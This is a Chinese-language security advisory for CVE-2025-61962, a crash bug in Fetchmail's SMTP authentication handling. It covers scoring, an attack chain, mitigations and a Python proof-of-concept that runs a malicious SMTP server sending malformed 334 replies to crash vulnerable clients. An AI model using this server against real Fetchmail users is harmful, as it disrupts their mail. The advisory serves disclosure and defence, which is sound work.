CVE-2025-61962 Fetchmail SMTP客户端认证崩溃漏洞

漏洞信息

漏洞编号

CVE-2025-61962

漏洞类型

拒绝服务（DoS）/空指针解引用

CVSS评分

5.9 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Fetchmail

漏洞概述

CVE-2025-61962是Fetchmail邮件客户端软件中的一个拒绝服务漏洞，影响6.5.6之前的所有版本。Fetchmail是一款经典的开源邮件检索工具，广泛用于Linux/Unix系统中从远程邮件服务器下载邮件。该漏洞存在于Fetchmail的SMTP客户端模块中，具体发生在SMTP认证过程中。当SMTP服务器在畸形上下文中返回334状态码时，Fetchmail的SMTP客户端会发生崩溃，导致邮件检索过程中断。

根据CVSS 3.1评分系统，该漏洞评分为5.9分，属于中危级别。攻击向量为网络（AV:N），攻击复杂度较高（AC:H），无需权限（PR:N）和用户交互（UI:N）。该漏洞对机密性无影响（C:N），对完整性无影响（I:N），但对可用性影响较高（A:H）。这意味着攻击者可以利用该漏洞使目标系统的Fetchmail服务崩溃，影响正常邮件收取功能，可能导致邮件丢失或延迟。

该漏洞由[email protected]于2025年10月4日披露，官方已在Fetchmail 6.5.6版本中修复。漏洞的修复提交可在GitLab的fetchmail项目仓库中找到（commit: 4c3cebfa4e659fb778ca2cae0ccb3f69201609a8），同时Fetchmail官方发布了安全公告SA-2025-01。攻击者可以通过搭建恶意SMTP服务器，诱导使用Fetchmail的用户连接到该服务器，触发认证过程中的崩溃，从而实现拒绝服务攻击。

技术细节

该漏洞的根本原因在于Fetchmail SMTP客户端在处理SMTP认证流程时，对334状态码的解析逻辑存在缺陷。在标准的SMTP认证（通常是AUTH LOGIN或AUTH PLAIN机制）中，334状态码用于服务器向客户端发送认证质询（challenge），客户端需要以Base64编码的用户名或密码进行响应。

然而，当334状态码出现在非预期的上下文中时（例如在不应该出现质询的认证阶段），Fetchmail的代码未能正确处理这种异常情况。具体而言，代码可能在未正确初始化相关数据结构或缓冲区的情况下尝试解析334响应，导致空指针解引用或缓冲区访问错误，从而引发段错误（segfault）使进程崩溃。

攻击利用方式：攻击者部署一个恶意的SMTP服务器，在与Fetchmail客户端的认证握手过程中，在畸形的时间点发送334状态码。当Fetchmail客户端尝试处理该响应时，会触发崩溃。攻击者可以通过DNS劫持、中间人攻击或社会工程学手段，诱使目标用户将Fetchmail配置为连接到恶意SMTP服务器。由于该漏洞无需认证且无需用户交互（一旦配置完成），攻击条件相对容易满足。

攻击链分析

STEP 1

步骤1：搭建恶意SMTP服务器

攻击者部署一个恶意的SMTP服务器，该服务器被配置为在SMTP认证握手过程中，在畸形上下文中返回334状态码。

STEP 2

步骤2：诱导目标连接到恶意服务器

攻击者通过DNS劫持、ARP欺骗、社会工程学或修改Fetchmail配置文件等方式，诱使目标系统上的Fetchmail连接到恶意SMTP服务器。

STEP 3

步骤3：触发认证流程

Fetchmail按照正常流程与SMTP服务器建立连接并发起AUTH认证请求。

STEP 4

步骤4：发送畸形334响应

恶意SMTP服务器在非预期的认证阶段返回334状态码，触发Fetchmail SMTP客户端的崩溃逻辑。

STEP 5

步骤5：客户端崩溃

Fetchmail进程因空指针解引用或缓冲区错误发生段错误（segfault）而崩溃，导致邮件收取功能中断。

STEP 6

步骤6：持续拒绝服务

如果Fetchmail配置了自动重试或定时运行，攻击者可以持续利用该漏洞阻止用户正常收取邮件。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
CVE-2025-61962 - Fetchmail SMTP Client DoS PoC
This PoC sets up a malicious SMTP server that sends a malformed 334 response
during the authentication process to crash vulnerable Fetchmail (< 6.5.6) clients.
"""

import socket
import threading
import sys

def handle_client(conn, addr):
    """Handle a single SMTP client connection with malicious behavior."""
    try:
        # Send initial SMTP banner
        conn.sendall(b"220 malicious-smtp.local ESMTP Ready\r\n")

        # Handle EHLO/HELO
        data = conn.recv(1024)
        print(f"[<-] {data.strip().decode(errors='replace')}")
        conn.sendall(b"250-malicious-smtp.local Hello\r\n")
        conn.sendall(b"250 AUTH LOGIN PLAIN\r\n")

        # Handle AUTH command - trigger the vulnerability here
        data = conn.recv(1024)
        print(f"[<-] {data.strip().decode(errors='replace')}")

        # Instead of sending expected 334 challenge at the right time,
        # send 334 in a malformed/unexpected context to trigger the crash
        # in vulnerable Fetchmail versions
        conn.sendall(b"334\r\n")

        # Wait briefly for client to process and crash
        try:
            data = conn.recv(1024)
            print(f"[<-] {data.strip().decode(errors='replace')}")
        except:
            pass

        # Send additional malformed 334 to ensure crash
        conn.sendall(b"334 \r\n")

    except Exception as e:
        print(f"[ERROR] {e}")
    finally:
        conn.close()


def main():
    host = "0.0.0.0"
    port = 2525  # Non-standard SMTP port to avoid conflicts

    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    server.bind((host, port))
    server.listen(5)

    print(f"[*] Malicious SMTP server listening on {host}:{port}")
    print(f"[*] Configure Fetchmail to connect to this server to trigger CVE-2025-61962")

    while True:
        conn, addr = server.accept()
        print(f"[+] Connection from {addr}")
        t = threading.Thread(target=handle_client, args=(conn, addr))
        t.daemon = True
        t.start()


if __name__ == "__main__":
    main()

影响范围

fetchmail < 6.5.6

防御指南

临时缓解措施

在无法立即升级到Fetchmail 6.5.6版本的情况下，建议采取以下临时缓解措施：1）确保所有SMTP连接使用TLS加密（通过sslproto或sslcertck选项），防止中间人攻击篡改SMTP响应内容；2）限制Fetchmail仅连接到可信的、经过验证的SMTP服务器；3）使用防火墙规则限制Fetchmail的网络出口连接；4）监控Fetchmail进程状态，设置自动重启机制以减少服务中断时间；5）定期审查Fetchmail配置文件，确保邮件服务器地址未被篡改。